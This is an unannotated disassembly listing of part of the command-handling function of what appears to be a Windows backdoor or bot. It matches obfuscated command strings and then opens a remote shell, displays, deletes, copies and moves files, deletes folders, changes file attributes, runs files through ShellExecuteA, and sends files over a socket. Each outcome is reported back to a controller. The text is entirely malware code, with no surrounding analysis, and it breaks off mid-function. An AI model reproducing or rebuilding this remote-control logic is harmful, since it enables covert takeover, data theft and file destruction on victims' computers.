mov [ebp+var_28E4], eax
mov eax, [eax]
mov [ebp+var_28E0], eax
lea eax, [ebp+var_285C]
test ecx, ecx
jnz short loc_40F07E
push dword ptr [esi+0Ch]
jmp short loc_40F080
; ---------------------------------------------------------------------------
loc_40F07E: ; CODE XREF: sub_40A938+473F�j
push dword ptr [esi]
loc_40F080: ; CODE XREF: sub_40A938+4744�j
push eax
call dword_4370A4 ; lstrcpyA
push 0Fh
call sub_423737
test eax, eax
pop ecx
jle short loc_40F0A2
mov ebx, offset aSS_ ; "%s %s."
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
jmp loc_40F230
; ---------------------------------------------------------------------------
loc_40F0A2: ; CODE XREF: sub_40A938+4759�j
push [ebp+var_28E4]
lea eax, [ebp+var_285C]
push eax
call sub_41E6F8
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov edi, offset aWhdag1glagf_ ; "WHdAg1glAgf."
mov ebx, offset aSCouldnTOpenSh ; "%s Couldn't open shell."
jnz short loc_40F0E1
cmp [ebp+arg_14], 0
jnz short loc_40F0E1
cmp [ebp+arg_18], 0
jnz short loc_40F0E7
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40F0E1: ; CODE XREF: sub_40A938+478B�j
; sub_40A938+4791�j
cmp [ebp+arg_18], 0
jz short loc_40F0F5
loc_40F0E7: ; CODE XREF: sub_40A938+4797�j
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
jmp short loc_40F110
; ---------------------------------------------------------------------------
loc_40F0F5: ; CODE XREF: sub_40A938+47AD�j
cmp [ebp+arg_14], 0
jnz loc_4148CF
push edi
push offset aSShellReady_ ; "%s Shell ready."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
loc_40F110: ; CODE XREF: sub_40A938+47BB�j
add esp, 10h
cmp [ebp+arg_18], 0
jz loc_4148CF
push edi
push offset aSShellReady_ ; "%s Shell ready."
jmp loc_41467E
; ---------------------------------------------------------------------------
loc_40F128: ; CODE XREF: sub_40A938+470E�j
push dword ptr [ebx]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call edi ; dword_437174
test eax, eax
jnz loc_40F2AA
cmp [ebx+4], eax
jnz short loc_40F17C
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40F167
cmp [ebp+arg_18], eax
jnz short loc_40F171
push ebx
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40F167: ; CODE XREF: sub_40A938+4813�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F171: ; CODE XREF: sub_40A938+4818�j
push ebx
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
jmp loc_40C7CB
; ---------------------------------------------------------------------------
loc_40F17C: ; CODE XREF: sub_40A938+4804�j
push 2710h
lea eax, [ebp+var_3A760]
push 0
push eax
call sub_429690
mov edi, 104h
lea eax, [ebp+var_2A7C]
push edi
push 0
push eax
call sub_429690
push dword ptr [ebx+4]
lea eax, [ebp+var_2A7C]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 24h
push 2
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40F203
loc_40F1C5: ; CODE XREF: sub_40A938+48C9�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40F1F8
push eax
lea eax, [ebp+var_3A760]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_3A760]
push edi
push eax
lea eax, [ebp+var_2A7C]
push eax
call sub_429910
add esp, 18h
loc_40F1F8: ; CODE XREF: sub_40A938+4895�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40F1C5
loc_40F203: ; CODE XREF: sub_40A938+488B�j
lea eax, [ebp+var_2A7C]
push offset asc_440D78 ; "\n"
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_2A7C]
push eax
call sub_41E501
test eax, eax
pop ecx
jnz short loc_40F266
mov ebx, offset aSS_1 ; "%s %s"
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
loc_40F230: ; CODE XREF: sub_40A938+4765�j
cmp [ebp+arg_14], 0
jnz short loc_40F251
cmp [ebp+arg_18], 0
jnz short loc_40F25B
push edi
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40F251: ; CODE XREF: sub_40A938+48FC�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F25B: ; CODE XREF: sub_40A938+4902�j
push edi
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
jmp loc_40B035
; ---------------------------------------------------------------------------
loc_40F266: ; CODE XREF: sub_40A938+48EC�j
cmp [ebp+arg_14], 0
mov ebx, offset aWhdag1glagf_ ; "WHdAg1glAgf."
mov edi, offset aSCommandsS_ ; "%s Commands: %s."
jnz short loc_40F293
cmp [ebp+arg_18], 0
jnz short loc_40F29D
lea eax, [ebp+var_2A7C]
push eax
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40F293: ; CODE XREF: sub_40A938+493C�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F29D: ; CODE XREF: sub_40A938+4942�j
lea eax, [ebp+var_2A7C]
push eax
push ebx
jmp loc_40C7CB
; ---------------------------------------------------------------------------
loc_40F2AA: ; CODE XREF: sub_40A938+47FB�j
push dword ptr [ebx]
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
call edi ; dword_437174
test eax, eax
jnz short loc_40F2C3
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push 0Fh
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_40F2C3: ; CODE XREF: sub_40A938+497D�j
push dword ptr [ebx]
push offset aJc8j0_blhir0 ; "jC8j0.blHIr0"
call edi ; dword_437174
test eax, eax
jnz loc_40FAD9
xor ecx, ecx
cmp [ebx+4], ecx
jz loc_40FABE
mov eax, [ebx+8]
cmp eax, ecx
jz loc_40FABE
push eax
lea eax, [ebp+var_418]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 3
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40F34C
loc_40F30A: ; CODE XREF: sub_40A938+4A12�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40F341
push eax
lea eax, [ebp+var_63F70]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_63F70]
push 104h
push eax
lea eax, [ebp+var_418]
push eax
call sub_429910
add esp, 18h
loc_40F341: ; CODE XREF: sub_40A938+49DA�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40F30A
loc_40F34C: ; CODE XREF: sub_40A938+49D0�j
push dword ptr [ebx+4]
push offset aPiygc_bgpyh_ ; "PIYGC.BgPyH."
call edi ; dword_437174
test eax, eax
jnz loc_40F510
push dword ptr [ebx+8]
lea eax, [ebp+var_2470]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 3
pop edi
cmp [ebp+arg_4], edi
jle short loc_40F3B2
loc_40F37D: ; CODE XREF: sub_40A938+4A78�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40F3AC
push eax
lea eax, [ebp+var_68D90]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_68D90]
push eax
lea eax, [ebp+var_2470]
push eax
call sub_42A510
add esp, 14h
loc_40F3AC: ; CODE XREF: sub_40A938+4A4A�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40F37D
loc_40F3B2: ; CODE XREF: sub_40A938+4A43�j
lea eax, [ebp+var_2470]
push offset word_43EF70
push eax
call sub_42A43C
pop ecx
mov [ebp+arg_C], eax
test eax, eax
pop ecx
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz loc_40F4C1
cmp [ebp+arg_14], 0
mov ebx, offset aSDisplayingFil ; "%s Displaying file: %s"
jnz short loc_40F3FD
cmp [ebp+arg_18], 0
jnz short loc_40F403
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40F3FD: ; CODE XREF: sub_40A938+4AA6�j
cmp [ebp+arg_18], 0
jz short loc_40F419
loc_40F403: ; CODE XREF: sub_40A938+4AAC�j
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
loc_40F419: ; CODE XREF: sub_40A938+4AC9�j
mov ebx, 2710h
jmp short loc_40F446
; ---------------------------------------------------------------------------
loc_40F420: ; CODE XREF: sub_40A938+4B23�j
cmp [ebp+arg_14], 0
jnz short loc_40F446
cmp [ebp+arg_18], 0
jnz short loc_40F446
lea eax, [ebp+var_491C0]
push eax
push offset aS_5 ; "%s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40F446: ; CODE XREF: sub_40A938+4AE6�j
; sub_40A938+4AEC�j ...
push [ebp+arg_C]
lea eax, [ebp+var_491C0]
push ebx
push eax
call sub_42AFB7
add esp, 0Ch
test eax, eax
jnz short loc_40F420
cmp [ebp+arg_18], eax
jz short loc_40F47B
lea eax, [ebp+var_491C0]
push eax
push offset aS_5 ; "%s"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
loc_40F47B: ; CODE XREF: sub_40A938+4B28�j
push [ebp+arg_C]
call sub_42A03B
cmp [ebp+arg_14], 0
pop ecx
mov ebx, offset aSFileDisplayed ; "%s File displayed: %s"
jnz short loc_40F4AC
cmp [ebp+arg_18], 0
jnz short loc_40F4B6
lea eax, [ebp+var_2470]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40F4AC: ; CODE XREF: sub_40A938+4B55�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F4B6: ; CODE XREF: sub_40A938+4B5B�j
lea eax, [ebp+var_2470]
jmp loc_40B033
; ---------------------------------------------------------------------------
loc_40F4C1: ; CODE XREF: sub_40A938+4A97�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40F4F1
cmp [ebp+arg_18], 0
jnz short loc_40F4FB
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_2470]
push eax
push edi
push offset aSFailedToReadF ; "%s Failed to read file: %s,error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40F4F1: ; CODE XREF: sub_40A938+4B93�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F4FB: ; CODE XREF: sub_40A938+4B99�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_2470]
push eax
push edi
push offset aSFailedToReadF ; "%s Failed to read file: %s,error: <%d>"
jmp loc_414857
; ---------------------------------------------------------------------------
loc_40F510: ; CODE XREF: sub_40A938+4A20�j
push dword ptr [ebx+4]
push offset a7bqzu_aqz2u_ ; "7bQzU.aQz2u."
call edi ; dword_437174
test eax, eax
jnz short loc_40F554
lea eax, [ebp+var_418]
push eax
call sub_4276F7
test eax, eax
pop ecx
jz short loc_40F545
lea eax, [ebp+var_418]
push eax
push offset aLmecq0ygcok ; "lmecq0yGcoK/"
push offset aSFileExistsS ; "%s File exists: %s"
jmp loc_40D132
; ---------------------------------------------------------------------------
loc_40F545: ; CODE XREF: sub_40A938+4BF5�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
mov ebx, offset aSFileDoesnTExi ; "%s File doesn't exist: %s"
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F554: ; CODE XREF: sub_40A938+4BE4�j
push dword ptr [ebx+4]
push offset aSar5v0jloic0 ; "saR5v0JloIc0"
call edi ; dword_437174
test eax, eax
jnz short loc_40F5D1
lea eax, [ebp+var_418]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F582
mov ebx, offset aSFileDeletedS ; "%s File deleted: %s"
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F582: ; CODE XREF: sub_40A938+4C3E�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40F5B2
cmp [ebp+arg_18], 0
jnz short loc_40F5BC
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToDelFi ; "%s Failed to del file: %s, error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40F5B2: ; CODE XREF: sub_40A938+4C54�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F5BC: ; CODE XREF: sub_40A938+4C5A�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToDelFi ; "%s Failed to del file: %s, error: <%d>"
jmp loc_414857
; ---------------------------------------------------------------------------
loc_40F5D1: ; CODE XREF: sub_40A938+4C28�j
push dword ptr [ebx+4]
push offset aX43mxEgedu_ ; "x43Mx/eGeDu."
call edi ; dword_437174
test eax, eax
jnz short loc_40F64E
lea eax, [ebp+var_418]
push eax
call sub_4276F7
test eax, eax
pop ecx
jz short loc_40F63F
lea eax, [ebp+var_418]
push eax
call sub_42770C
test eax, eax
pop ecx
jz short loc_40F638
lea eax, [ebp+var_418]
push eax
call sub_428046
lea eax, [ebp+var_418]
push eax
call sub_4276F7
pop ecx
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
test eax, eax
pop ecx
jnz short loc_40F62E
mov ebx, offset aSFolderDeleted ; "%s Folder deleted: %s"
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F62E: ; CODE XREF: sub_40A938+4CEA�j
mov ebx, offset aSFailedToDelet ; "%s Failed to delete folder: %s"
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F638: ; CODE XREF: sub_40A938+4CC7�j
mov ebx, offset aSSIsNotAFolder ; "%s %s is not a folder."
jmp short loc_40F644
; ---------------------------------------------------------------------------
loc_40F63F: ; CODE XREF: sub_40A938+4CB6�j
mov ebx, offset aSSDoesnTExist_ ; "%s %s doesn't exist."
loc_40F644: ; CODE XREF: sub_40A938+4D05�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F64E: ; CODE XREF: sub_40A938+4CA5�j
push dword ptr [ebx+4]
push offset aIsopf_pu4ty0 ; "IsoPF.PU4tY0"
call edi ; dword_437174
test eax, eax
jnz loc_40F7BE
cmp [ebx+0Ch], eax
jz loc_40F7D5
push dword ptr [ebx+8]
lea eax, [ebp+var_418]
push eax
call sub_429A33
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_236C]
push eax
call sub_429A33
xor edi, edi
add esp, 10h
cmp [ebp+arg_34], edi
jz short loc_40F700
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40F69C
mov bl, [ebp+arg_38]
loc_40F69C: ; CODE XREF: sub_40A938+4D5F�j
lea eax, [ebp+var_418]
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40F6CD
loc_40F6AD: ; CODE XREF: sub_40A938+4D93�j
lea eax, [ebp+edi+var_418]
cmp [eax], bl
jnz short loc_40F6BB
mov byte ptr [eax], 20h
loc_40F6BB: ; CODE XREF: sub_40A938+4D7E�j
lea eax, [ebp+var_418]
inc edi
push eax
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_40F6AD
loc_40F6CD: ; CODE XREF: sub_40A938+4D73�j
lea eax, [ebp+var_236C]
xor edi, edi
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40F700
loc_40F6E0: ; CODE XREF: sub_40A938+4DC6�j
lea eax, [ebp+edi+var_236C]
cmp [eax], bl
jnz short loc_40F6EE
mov byte ptr [eax], 20h
loc_40F6EE: ; CODE XREF: sub_40A938+4DB1�j
lea eax, [ebp+var_236C]
inc edi
push eax
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_40F6E0
loc_40F700: ; CODE XREF: sub_40A938+4D57�j
; sub_40A938+4DA6�j
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
call dword_4370B4 ; MoveFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F761
cmp [ebp+arg_14], 0
mov ebx, offset aSMovedSToS ; "%s Moved: \"%s\" to: \"%s\""
jnz short loc_40F74C
cmp [ebp+arg_18], 0
jnz short loc_40F756
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40F74C: ; CODE XREF: sub_40A938+4DEE�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F756: ; CODE XREF: sub_40A938+4DF4�j
lea eax, [ebp+var_236C]
jmp loc_40F8EC
; ---------------------------------------------------------------------------
loc_40F761: ; CODE XREF: sub_40A938+4DE3�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40F798
cmp [ebp+arg_18], 0
jnz short loc_40F7A2
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToMoveS ; "%s Failed to move: \"%s\" to: \"%s\", error"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_40F798: ; CODE XREF: sub_40A938+4E33�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F7A2: ; CODE XREF: sub_40A938+4E39�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_236C]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToMoveS ; "%s Failed to move: \"%s\" to: \"%s\", error"...
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40A938+4D22�j
push dword ptr [ebx+4]
push offset a98mu_Nedn7_ ; "98mu./nEdn7."
call edi ; dword_437174
test eax, eax
jnz loc_40F956
cmp [ebx+0Ch], eax
jnz short loc_40F7F0
loc_40F7D5: ; CODE XREF: sub_40A938+4D2B�j
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
loc_40F7DA: ; CODE XREF: sub_40A938+4678�j
cmp [ebp+arg_14], eax
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40D1F7
cmp [ebp+arg_18], eax
jmp loc_40D1E5
; ---------------------------------------------------------------------------
loc_40F7F0: ; CODE XREF: sub_40A938+4E9B�j
push dword ptr [ebx+8]
lea eax, [ebp+var_418]
push eax
call sub_429A33
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_2574]
push eax
call sub_429A33
xor edi, edi
add esp, 10h
cmp [ebp+arg_34], edi
jz short loc_40F887
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40F823
mov bl, [ebp+arg_38]
loc_40F823: ; CODE XREF: sub_40A938+4EE6�j
lea eax, [ebp+var_418]
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40F854
loc_40F834: ; CODE XREF: sub_40A938+4F1A�j
lea eax, [ebp+edi+var_418]
cmp [eax], bl
jnz short loc_40F842
mov byte ptr [eax], 20h
loc_40F842: ; CODE XREF: sub_40A938+4F05�j
lea eax, [ebp+var_418]
inc edi
push eax
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_40F834
loc_40F854: ; CODE XREF: sub_40A938+4EFA�j
lea eax, [ebp+var_2574]
xor edi, edi
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40F887
loc_40F867: ; CODE XREF: sub_40A938+4F4D�j
lea eax, [ebp+edi+var_2574]
cmp [eax], bl
jnz short loc_40F875
mov byte ptr [eax], 20h
loc_40F875: ; CODE XREF: sub_40A938+4F38�j
lea eax, [ebp+var_2574]
inc edi
push eax
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_40F867
loc_40F887: ; CODE XREF: sub_40A938+4EDE�j
; sub_40A938+4F2D�j
xor eax, eax
cmp [ebp+arg_40], eax
setz al
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F8F9
cmp [ebp+arg_14], 0
mov ebx, offset aSCopiedSToS ; "%s Copied: \"%s\" to \"%s\""
jnz short loc_40F8DC
cmp [ebp+arg_18], 0
jnz short loc_40F8E6
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40F8DC: ; CODE XREF: sub_40A938+4F7E�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F8E6: ; CODE XREF: sub_40A938+4F84�j
lea eax, [ebp+var_2574]
loc_40F8EC: ; CODE XREF: sub_40A938+4E24�j
push eax
lea eax, [ebp+var_418]
push eax
jmp loc_40B637
; ---------------------------------------------------------------------------
loc_40F8F9: ; CODE XREF: sub_40A938+4F73�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40F930
cmp [ebp+arg_18], 0
jnz short loc_40F93A
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToCopyS ; "%s Failed to copy: \"%s\" to \"%s\",error: "...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_40F930: ; CODE XREF: sub_40A938+4FCB�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F93A: ; CODE XREF: sub_40A938+4FD1�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_2574]
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToCopyS ; "%s Failed to copy: \"%s\" to \"%s\",error: "...
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_40F956: ; CODE XREF: sub_40A938+4E92�j
push dword ptr [ebx+4]
push offset aVdirq_mjcpx1 ; "vDIrQ.MJcpx1"
call edi ; dword_437174
test eax, eax
jnz loc_40FA01
cmp [ebp+arg_44], eax
jz short loc_40F971
or [ebp+arg_C], 4
loc_40F971: ; CODE XREF: sub_40A938+5033�j
cmp [ebp+arg_48], eax
jz short loc_40F97A
or [ebp+arg_C], 2
loc_40F97A: ; CODE XREF: sub_40A938+503C�j
cmp [ebp+arg_4C], eax
jz short loc_40F983
or [ebp+arg_C], 1
loc_40F983: ; CODE XREF: sub_40A938+5045�j
cmp [ebp+arg_50], eax
jz short loc_40F98F
mov [ebp+arg_C], 80h
loc_40F98F: ; CODE XREF: sub_40A938+504E�j
push [ebp+arg_C]
lea eax, [ebp+var_418]
push eax
call dword_437068 ; SetFileAttributesA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40F9B2
mov ebx, offset aSAttributesSet ; "%s Attributes Set to: \"%s\"."
jmp loc_40FA37
; ---------------------------------------------------------------------------
loc_40F9B2: ; CODE XREF: sub_40A938+506E�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40F9E2
cmp [ebp+arg_18], 0
jnz short loc_40F9EC
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToSetAt ; "%s Failed to set Attributes to: \"%s\",er"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40F9E2: ; CODE XREF: sub_40A938+5084�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40F9EC: ; CODE XREF: sub_40A938+508A�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToSetAt ; "%s Failed to set Attributes to: \"%s\",er"...
jmp loc_414857
; ---------------------------------------------------------------------------
loc_40FA01: ; CODE XREF: sub_40A938+502A�j
push dword ptr [ebx+4]
push offset aSad25HpR91 ; "Sad25/hP/R91"
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
push eax
push eax
lea ecx, [ebp+var_418]
push eax
push ecx
push offset aOpen ; "open"
push eax
call dword_456E54 ; ShellExecuteA
test eax, eax
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jz short loc_40FA6F
mov ebx, offset aSOpenedS_ ; "%s Opened: \"%s\"."
loc_40FA37: ; CODE XREF: sub_40A938+4C17�j
; sub_40A938+4C45�j ...
cmp [ebp+arg_14], 0
jnz short loc_40FA5A
cmp [ebp+arg_18], 0
jnz short loc_40FA64
lea eax, [ebp+var_418]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40FA5A: ; CODE XREF: sub_40A938+5103�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40FA64: ; CODE XREF: sub_40A938+5109�j
lea eax, [ebp+var_418]
jmp loc_40B033
; ---------------------------------------------------------------------------
loc_40FA6F: ; CODE XREF: sub_40A938+50F8�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
jnz short loc_40FA9F
cmp [ebp+arg_18], 0
jnz short loc_40FAA9
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToOpenS ; "%s Failed to open: \"%s\",error: <%d>"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40FA9F: ; CODE XREF: sub_40A938+5141�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40FAA9: ; CODE XREF: sub_40A938+5147�j
call ebx ; dword_43716C
push eax
lea eax, [ebp+var_418]
push eax
push edi
push offset aSFailedToOpenS ; "%s Failed to open: \"%s\",error: <%d>"
jmp loc_414857
; ---------------------------------------------------------------------------
loc_40FABE: ; CODE XREF: sub_40A938+49A1�j
; sub_40A938+49AC�j
cmp [ebp+arg_14], ecx
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
mov edi, offset aLmecq0ygcok ; "lmecq0yGcoK/"
jnz loc_40D1F7
cmp [ebp+arg_18], ecx
jmp loc_40D1E5
; ---------------------------------------------------------------------------
loc_40FAD9: ; CODE XREF: sub_40A938+4996�j
push dword ptr [ebx]
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
call edi ; dword_437174
test eax, eax
jnz loc_40FECA
xor edi, edi
cmp [ebx+4], edi
jnz short loc_40FB2D
cmp [ebp+arg_14], edi
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40FB19
cmp [ebp+arg_18], edi
jnz short loc_40FB22
push ebx
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40FB19: ; CODE XREF: sub_40A938+51C1�j
cmp [ebp+arg_18], edi
jz loc_4148CF
loc_40FB22: ; CODE XREF: sub_40A938+51C6�j
push ebx
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
jmp loc_4146C6
; ---------------------------------------------------------------------------
loc_40FB2D: ; CODE XREF: sub_40A938+51B7�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_14]
mov [ebp+var_21C0], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1F98], eax
cmp eax, edi
mov [ebp+var_1F94], ecx
lea eax, [ebp+var_21B8]
jnz short loc_40FB57
push dword ptr [esi+0Ch]
jmp short loc_40FB59
; ---------------------------------------------------------------------------
loc_40FB57: ; CODE XREF: sub_40A938+5218�j
push dword ptr [esi]
loc_40FB59: ; CODE XREF: sub_40A938+521D�j
push eax
call dword_4370A4 ; lstrcpyA
push 80h
lea eax, [ebp+var_2020]
push dword ptr [esi]
push eax
call sub_429C40
push dword ptr [ebx+4]
lea eax, [ebp+var_2124]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 18h
lea eax, [ebp+var_2124]
mov [ebp+var_48], edi
mov [ebp+arg_8], edi
push edi
push edi
push 3
push edi
push 1
push 80000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_68], eax
jnz short loc_40FBCF
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSNoFile ; "%s No file"
push eax
push [ebp+arg_10]
call sub_41CD84
jmp loc_40B9A4
; ---------------------------------------------------------------------------
loc_40FBCF: ; CODE XREF: sub_40A938+5277�j
push edi
push [ebp+arg_68]
call dword_4370B0 ; GetFileSize
push edi
push 1
push 2
mov ebx, eax
call dword_4372B8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_C], eax
jnz short loc_40FC1B
loc_40FBEE: ; CODE XREF: sub_40A938+537E�j
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSD ; "%s %s <%d>"
